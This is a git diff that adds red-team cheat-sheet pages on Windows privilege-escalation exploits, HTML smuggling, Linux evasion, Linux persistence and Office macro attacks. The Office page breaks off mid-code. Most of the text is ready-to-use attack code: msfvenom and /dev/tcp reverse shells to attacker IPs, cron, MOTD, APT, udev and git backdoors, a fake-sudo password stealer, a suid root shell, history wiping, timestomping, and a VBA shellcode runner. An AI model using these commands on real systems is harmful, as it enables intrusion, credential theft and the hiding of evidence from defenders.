[thezdi/FilesystemEoPs/FolderOrFileDeleteToSystem](https://github.com/thezdi/PoC/tree/master/FilesystemEoPs/FolderOrFileDeleteToSystem). +The exploit contains a .msi file with 2 actions, the first one produces a delay and the second throws an error to make it rollback. This rollback will "restore" a malicious HID.dll in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. + +Then switch to the secure desktop using `[CTRL]+[ALT]+[DELETE]` and open the On-Screen Keyboard (`osk.exe`). +The `osk.exe` process first looks for the `C:\Program Files\Common Files\microsoft shared\ink\HID.dll` library instead of `C:\Windows\System32\HID.dll` + + +## EoP - Common Vulnerabilities and Exposure + +### MS08-067 (NetAPI) + +Check the vulnerability with the following nmap script. + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 +``` + +Metasploit modules to exploit `MS08-067 NetAPI`. + +```powershell +exploit/windows/smb/ms08_067_netapi +``` + +If you can't use Metasploit and only want a reverse shell. + +```powershell +https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows + +Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 +Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) +Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal +Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English +Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) +Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) +Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) +python ms08-067.py 10.0.0.1 6 445 +``` + + +### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 + +'KiTrap0D' User Mode to Ring Escalation (MS10-015) + +```powershell +https://www.exploit-db.com/exploits/11199 + +Metasploit : exploit/windows/local/ms10_015_kitrap0d +``` + +### MS11-080 (afd.sys) - Microsoft Windows XP/2003 + +```powershell +Python: https://www.exploit-db.com/exploits/18176 +Metasploit: exploit/windows/local/ms11_080_afdjoinleaf +``` + +### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 + +```powershell +printf("[#] usage: ms15-051 command \n"); +printf("[#] eg: ms15-051 \"whoami /all\" \n"); + +# x32 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe + +# x64 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe + +https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 +use exploit/windows/local/ms15_051_client_copy_image +``` + + +### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) + +Check if the patch is installed : `wmic qfe list | findstr "3139914"` + +```powershell +Powershell: +https://www.exploit-db.com/exploits/39719/ +https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 + +Binary exe : https://github.com/Meatballs1/ms16-032 + +Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc +``` + +### MS17-010 (Eternal Blue) + +Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 +``` + +Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. + +```powershell +auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution +auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection +exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption +exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ +exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution +``` + +If you can't use Metasploit and only want a reverse shell. + +```powershell +git clone https://github.com/helviojunior/MS17-010 + +# generate a simple reverse shell to use +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe +python2 send_and_execute.py 10.0.0.1 revshell.exe +``` + +### CVE-2019-1388 + +Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html + +Requirement: +- Windows 7 +- Windows 10 LTSC 10240 + +Failing on : +- LTSC 2019 +- 1709 +- 1803 + +Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege + + +## References + +* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) +* [Privilege Escalation Windows - Philip Linghammar](https://web.archive.org/web/20191231011305/https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) +* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) +* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) +* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) +* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) +* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) +* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) +* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) +* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) +* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) +* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) +* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) +* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/) +* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) +* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/) +* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/) +* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) +* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) +* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/) +* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) +* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) +* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) +* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) +* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) +* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://web.archive.org/web/20191105182846/https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/2019/03/06/abusing-diaghub/) +* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) +* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) +* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) +* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) +* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) +* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) +* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) +* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) +* [IN THE POTATO FAMILY, I WANT THEM ALL - @BlWasp_ ](https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all) +* [Potatoes - Windows Privilege Escalation - Jorge Lajara - November 22, 2020](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) +* [MSIFortune - LPE with MSI Installers - Oct 3, 2023 - PfiatDe](https://badoption.eu/blog/2023/10/03/MSIFortune.html) +* [MSI Shenanigans. Part 1 – Offensive Capabilities Overview - DECEMBER 8, 2022 - Mariusz Banach](https://mgeeky.tech/msi-shenanigans-part-1/) +* [Escalating Privileges via Third-Party Windows Installers - ANDREW OLIVEAU - JUL 19, 2023](https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers) +* [Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter - ANDREW OLIVEAU - SEP 11, 2023](https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities) +* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - Simon Zuckerbraun - March 17, 2022 ](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) \ No newline at end of file diff --git a/docs/redteam/HTML Smuggling.md b/docs/redteam/HTML Smuggling.md new file mode 100644 index 0000000..cb90d11 --- /dev/null +++ b/docs/redteam/HTML Smuggling.md @@ -0,0 +1,43 @@ +# HTML Smuggling + +## Summary + +- [Description](#description) +- [Executable Storage](#executable-storage) + + +## Description + +HTML Smuggling consists of making a user to navigate to our crafted HTML page which automaticaly download our malicious file. + +## Executable storage + +We can store our payload in a Blob object => JS: `var blob = new Blob([data], {type: 'octet/stream'});` +To perform the download, we need to create an Object Url => JS: `var url = window.URL.createObjectURL(blob);` +With those two elements, we can create with Javascript our \ tag which will be used to download our malicious file: +```Javascript +var a = document.createElement('a'); +document.body.appendChild(a); +a.style = 'display: none'; +var url = window.URL.createObjectURL(blob); +a.href = url; +a.download = fileName; +a.click(); +window.URL.revokeObjectURL(url); +``` + +To store ou payload, we use base64 encoding: +```Javascript +function base64ToArrayBuffer(base64) { + var binary_string = window.atob(base64); + var len = binary_string.length; + var bytes = new Uint8Array( len ); + for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); } + return bytes.buffer; +} + +var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA... +var data = base64ToArrayBuffer(file); +var blob = new Blob([data], {type: 'octet/stream'}); +var fileName = 'NotAMalware.exe'; +``` \ No newline at end of file diff --git a/docs/redteam/Linux - Evasion.md b/docs/redteam/Linux - Evasion.md new file mode 100644 index 0000000..8ed2089 --- /dev/null +++ b/docs/redteam/Linux - Evasion.md @@ -0,0 +1,120 @@ +# Linux - Evasion + +## Summary + +- [File names](#file-names) +- [Command history](#command-history) +- [Hiding text](#hiding-text) +- [Timestomping](#timestomping) + + +## File Names + +An Unicode zero-width space can be inserted into filenames which makes the names visually indistinguishable: + +```bash +# A decoy file with no special characters +touch 'index.php' + +# An imposter file with visually identical name +touch $'index\u200D.php' +``` + + +## Command History + +Most shells save their command history so a user can recall them again later. The command history can be viewed with the `history` command or by manually inspecting the contents of the file pointed to by `$HISTFILE` (e.g. `~/.bash_history`). +This can be prevented in a number of ways. + +```bash +# Prevent writing to the history file at all +unset HISTFILE + +# Don't save this session's command history in memory +export HISTSIZE=0 +``` + +Individual commands that match a pattern in `HISTIGNORE` will be excluded from the command history, regardless of `HISTFILE` or `HISTSIZE` settings. +By default, `HISTIGNORE` will ignore all commands that begin with whitespace: + +```bash +# Note the leading space character: + my-sneaky-command +``` + +If commands are accidentally added to the command history, individual command entries can be removed with `history -d`: + +```bash +# Removes the most recently logged command. +# Note that we actually have to delete two history entries at once, +# otherwise the `history -d` command itself will be logged as well. +history -d -2 && history -d -1 +``` + +The entire command history can be purged as well, although this approach is much less subtle and very likely to be noticed: + +```bash +# Clears the in-memory history and writes the empty history to disk. +history -c && history -w +``` + + +## Hiding Text + +ANSI escape sequences can be abused to hide text under certain circumstances. +If the file's contents are printed to the terminal (e.g. `cat`, `head`, `tail`) then the text will be hidden. +If the file is viewed with an editor (e.g. `vim`, `nano`, `emacs`), then the escape sequences will be visible. + +```bash +echo "sneaky-payload-command" > script.sh +echo "# $(clear)" >> script.sh +echo "# Do not remove. Generated from /etc/issue.conf by configure." >> script.sh + +# When printed, the terminal will be cleared and only the last line will be visible: +cat script.sh +``` + + +## Timestomping + +Timestomping refers to the alteration of a file or directory's modification/access timestamps in order to conceal the fact that it was modified. +The simplest way to accomplish this is with the `touch` command: + +```bash +# Changes the access (-a) and modification (-m) times using YYYYMMDDhhmm format. +touch -a -m -t 202210312359 "example" + +# Changes time using a Unix epoch timestamp. +touch -a -m -d @1667275140 "example" + +# Copies timestamp from one file to another. +touch -a -m -r "other_file" "example" + +# Get the file's modification timestamp, modify the file, then restore the timestamp. +MODIFIED_TS=$(stat --format="%Y" "example") +echo "backdoor" >> "example" +touch -a -m -d @$MODIFIED_TS "example" +``` + +It should be noted that `touch` can only modify the access and modification timestamps. It can't be used to update a file's "change" or "birth" timestamps. The birth timestamp, if supported by the filesystem, tracks when the file was created. The change timestamp tracks whenever the file's metadata changes, including updates to the access and modification timestamps. + +If an attacker has root privileges, they can work around this limitation by modifying the system clock, creating or modifying a file, then reverting the system clock: + +```bash +ORIG_TIME=$(date) +date -s "2022-10-31 23:59:59" +touch -a -m "example" +date -s "${ORIG_TIME}" +``` + +Don't forget that creating a file also updates the parent directory's modification timestamp as well! + + +## References + +- [ATT&CK - Impair Defenses: Impair Command History Logging](https://attack.mitre.org/techniques/T1562/003/) +- [ATT&CK - Indicator Removal: Timestomp](https://attack.mitre.org/techniques/T1070/006/) +- [ATT&CK - Indicator Removal on Host: Clear Command History](https://attack.mitre.org/techniques/T1070/003/) +- [ATT&CK - Masquerading: Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/) +- [Wikipedia - ANSI escape codes](https://en.wikipedia.org/wiki/ANSI_escape_code) +- [InverseCos - Detecting Linux Anti-Forensics: Timestomping](https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html) diff --git a/docs/redteam/Linux - Persistence.md b/docs/redteam/Linux - Persistence.md new file mode 100644 index 0000000..43f395d --- /dev/null +++ b/docs/redteam/Linux - Persistence.md @@ -0,0 +1,237 @@ +# Linux - Persistence + +## Summary + +* [Basic reverse shell](#basic-reverse-shell) +* [Add a root user](#add-a-root-user) +* [Suid Binary](#suid-binary) +* [Crontab - Reverse shell](#crontab---reverse-shell) +* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc) +* [Backdooring a startup service](#backdooring-a-startup-service) +* [Backdooring a user startup file](#backdooring-a-user-startup-file) +* [Backdooring Message of the Day](#backdooring-message-of-the-day) +* [Backdooring a driver](#backdooring-a-driver) +* [Backdooring the APT](#backdooring-the-apt) +* [Backdooring the SSH](#backdooring-the-ssh) +* [Backdooring Git](#backdooring-git) +* [Additional Linux Persistence Options](#additional-persistence-options) +* [References](#references) + + +## Basic reverse shell + +```bash +ncat --udp -lvp 4242 +ncat --sctp -lvp 4242 +ncat --tcp -lvp 4242 +``` + +## Add a root user + +```powershell +sudo useradd -ou 0 -g 0 john +sudo passwd john +echo "linuxpassword" | passwd --stdin john +``` + +## Suid Binary + +```powershell +TMPDIR2="/var/tmp" +echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c +gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null +rm $TMPDIR2/croissant.c +chown root:root $TMPDIR2/croissant +chmod 4777 $TMPDIR2/croissant +``` + +## Crontab - Reverse shell + +```bash +(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null +``` + +## Backdooring a user's bash_rc + +(FR/EN Version) + +```bash +TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" +cat << EOF > /tmp/$TMPNAME2 + alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S ' +EOF +if [ -f ~/.bashrc ]; then + cat /tmp/$TMPNAME2 >> ~/.bashrc +fi +if [ -f ~/.zshrc ]; then + cat /tmp/$TMPNAME2 >> ~/.zshrc +fi +rm /tmp/$TMPNAME2 +``` + +or add the following line inside its .bashrc file. + +```powershell +$ chmod u+x ~/.hidden/fakesudo +$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc +``` + +and create the `fakesudo` script. + +```powershell +read -sp "[sudo] password for $USER: " sudopass +echo "" +sleep 2 +echo "Sorry, try again." +echo $sudopass >> /tmp/pass.txt + +/usr/bin/sudo $@ +``` + + +## Backdooring a startup service + +* Edit `/etc/network/if-up.d/upstart` file + ```bash + RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" + sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart + ``` + + +## Backdooring Message of the Day + +* Edit `/etc/update-motd.d/00-header` file + ```bash + echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header + ``` + + +## Backdooring a user startup file + +Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` + +```powershell +In : ~/.config/autostart/*.desktop + +[Desktop Entry] +Type=Application +Name=Welcome +Exec=/var/lib/gnome-welcome-tour +AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide +OnlyShowIn=GNOME; +X-GNOME-Autostart-enabled=false +``` + +## Backdooring a driver + +```bash +echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null +``` + +## Backdooring the APT + +If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};` +Next time "apt-get update" is done, your CMD will be executed! + +```bash +echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor +``` + +## Backdooring the SSH + +Add an ssh key into the `~/.ssh` folder. + +1. `ssh-keygen` +2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys` +3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys + +## Backdooring Git + +Backdooring git can be a useful way to obtain persistence without the need for root access. +Special care must be taken to ensure that the backdoor commands create no output, otherwise the persistence is trivial to notice. + +### Git Configs + +There are multiple [git config variables](https://git-scm.com/docs/git-config) that execute arbitrary commands when certain actions are taken. +As an added bonus, git configs can be specified multiple ways leading to additional backdoor opportunities. +Configs can be set at the user level (`~/.gitconfig`), at the repository level (`path/to/repo/.git/config`), and sometimes via environment variables. + +`core.editor` is executed whenever git needs to provide the user with an editor (e.g. `git rebase -i`, `git commit --amend`). +The equivalent environment variable is `GIT_EDITOR`. + +```properties +[core] +editor = nohup BACKDOOR >/dev/null 2>&1 & ${VISUAL:-${EDITOR:-emacs}} +``` + +`core.pager` is executed whenever git needs to potentially large amounts of data (e.g. `git diff`, `git log`, `git show`). +The equivalent environment variable is `GIT_PAGER`. + +```properties +[core] +pager = nohup BACKDOOR >/dev/null 2>&1 & ${PAGER:-less} +``` + +`core.sshCommand` is executed whenever git needs to interact with a remote *ssh* repository (e.g. `git fetch`, `git pull`, `git push`). +The equivalent environment variable is `GIT_SSH` or `GIT_SSH_COMMAND`. + +```properties +[core] +sshCommand = nohup BACKDOOR >/dev/null 2>&1 & ssh +[ssh] +variant = ssh +``` + +Note that `ssh.variant` (`GIT_SSH_VARIANT`) is technically optional, but without it git will run `sshCommand` _twice_ in rapid succession. (The first run is to determine the SSH variant and the second to pass it the correct parameters.) + +### Git Hooks + +[Git hooks](https://git-scm.com/docs/githooks) are programs you can place in a hooks directory to trigger actions at certain points during git's execution. +By default, hooks are stored in a repository's `.git/hooks` directory and are run when their name matches the current git action and the hook is marked as executable (i.e. `chmod +x`). +Potentially useful hook scripts to backdoor: + +- `pre-commit` is run just before `git commit` is executed. +- `pre-push` is run just before `git push` is executed. +- `post-checkout` is run just after `git checkout` is executed. +- `post-merge` is run after `git merge` or after `git pull` applies new changes. + +In addition to spawning a backdoor, some of the above hooks can be used to sneak malicious changes into a repo without the user noticing. + +Lastly, it is possible to globally backdoor _all_ of a user's git hooks by setting the `core.hooksPath` git config variable to a common directory in the user-level git config file (`~/.gitconfig`). Note that this approach will break any existing repository-specific git hooks. + + +## Additional Persistence Options + +* [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004) +* [Compromise Client Software Binary](https://attack.mitre.org/techniques/T1554) +* [Create Account](https://attack.mitre.org/techniques/T1136/) +* [Create Account: Local Account](https://attack.mitre.org/techniques/T1136/001/) +* [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/) +* [Create or Modify System Process: Systemd Service](https://attack.mitre.org/techniques/T1543/002/) +* [Event Triggered Execution: Trap](https://attack.mitre.org/techniques/T1546/005/) +* [Event Triggered Execution](https://attack.mitre.org/techniques/T1546/) +* [Event Triggered Execution: .bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004/) +* [External Remote Services](https://attack.mitre.org/techniques/T1133/) +* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/) +* [Hijack Execution Flow: LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006/) +* [Pre-OS Boot](https://attack.mitre.org/techniques/T1542/) +* [Pre-OS Boot: Bootkit](https://attack.mitre.org/techniques/T1542/003/) +* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/) +* [Scheduled Task/Job: At (Linux)](https://attack.mitre.org/techniques/T1053/001/) +* [Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/) +* [Server Software Component](https://attack.mitre.org/techniques/T1505/) +* [Server Software Component: SQL Stored Procedures](https://attack.mitre.org/techniques/T1505/001/) +* [Server Software Component: Transport Agent](https://attack.mitre.org/techniques/T1505/002/) +* [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003/) +* [Traffic Signaling](https://attack.mitre.org/techniques/T1205/) +* [Traffic Signaling: Port Knocking](https://attack.mitre.org/techniques/T1205/001/) +* [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001/) +* [Valid Accounts: Domain Accounts 2](https://attack.mitre.org/techniques/T1078/002/) + +## References + +* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) +* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) +* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html) +* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/) +* [Pouki from JDI](#no_source_code) diff --git a/docs/redteam/Office - Attacks.md b/docs/redteam/Office - Attacks.md new file mode 100644 index 0000000..bd00eda --- /dev/null +++ b/docs/redteam/Office - Attacks.md @@ -0,0 +1,747 @@ +# Office - Attacks + +### Summary + +* [Office Products Features](#office-products-features) +* [Office Default Passwords](#office-default-passwords) +* [Office Macro execute WinAPI](#office-macro-execute-winapi) +* [Excel](#excel) + * [XLSM - Hot Manchego](#xlsm---hot-manchego) + * [XLS - Macrome](#xls---macrome) + * [XLM Excel 4.0 - SharpShooter](#xlm-excel-40---sharpshooter) + * [XLM Excel 4.0 - EXCELntDonut](#xlm-excel-40---excelntdonut) + * [XLM Excel 4.0 - EXEC](#xlm-excel-40---exec) + * [SLK - EXEC](#slk---exec) +* [Word](#word) + * [DOCM - Metasploit](#docm---metasploit) + * [DOCM - Download and Execute](#docm---download-and-execute) + * [DOCM - Macro Creator](#docm---macro-creator) + * [DOCM - C# converted to Office VBA macro](#docm---c-converted-to-office-vba-macro) + * [DOCM - VBA Wscript](#docm---vba-wscript) + * [DOCM - VBA Shell Execute Comment](#docm---vba-shell-execute-comment) + * [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchostexe-using-scheduled-task) + * [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions) + * [DOCM - winmgmts](#docm---winmgmts) + * [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde) + * [DOCM - BadAssMacros](#docm---badassmacros) + * [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module) + * [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec) + * [VBA Obfuscation](#vba-obfuscation) + * [VBA Purging](#vba-purging) + * [OfficePurge](#officepurge) + * [EvilClippy](#evilclippy) + * [VBA AMSI](#vba-amsi) + * [VBA - Offensive Security Template](#vba---offensive-security-template) + * [DOCX - Template Injection](#docx---template-injection) + * [DOCX - DDE](#docx---dde) +* [References](#references) + +## Office Products Features + +![Overview of features supported by different Office products](https://www.securesystems.de/images/blog/offphish-phishing-revisited-in-2023/Office_documents_feature_overview.png) + + +## Office Default Passwords + +By default, Excel does not set a password when saving a new file. However, some older versions of Excel had a default password that was used if the user did not set a password themselves. The default password was "`VelvetSweatshop`", and it could be used to open any file that did not have a password set. + +> If the user has not supplied an encryption password and the document is encrypted, the default encryption choice using the techniques specified in section 2.3 MUST be the following password: "`\x2f\x30\x31\x48\x61\x6e\x6e\x65\x73\x20\x52\x75\x65\x73\x63\x68\x65\x72\x2f\x30\x31`". - [2.4.2.3 Binary Document Write Protection Method 3](https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-offcrypto/57fc02f0-c1de-4fc6-908f-d146104662f5) + +| Product | Password | Supported Formats | +|------------|------------------|-------------------| +| Excel | VelvetSweatshop | all Excel formats | +| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt | + +## Office Macro execute WinAPI + +### Description + +To importe Win32 function we need to use the keyword `Private Declare` +`Private Declare Function Lib "" Alias "" ( As , etc.) As ` +If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function` +Importing the `GetUserNameA` from `advapi32.dll`: +```VBA +Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long +``` +`GetUserNameA` prototype in C: +```C +BOOL GetUserNameA( + LPSTR lpBuffer, + LPDWORD pcbBuffer +); +``` +### Example with a simple Shellcode Runner +```VBA +Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr +Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr +Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr + +Sub WinAPI() + Dim buf As Variant + Dim addr As LongPtr + Dim counter As Long + Dim data As Long + + buf = Array(252, ...) + + addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) + + + For counter = 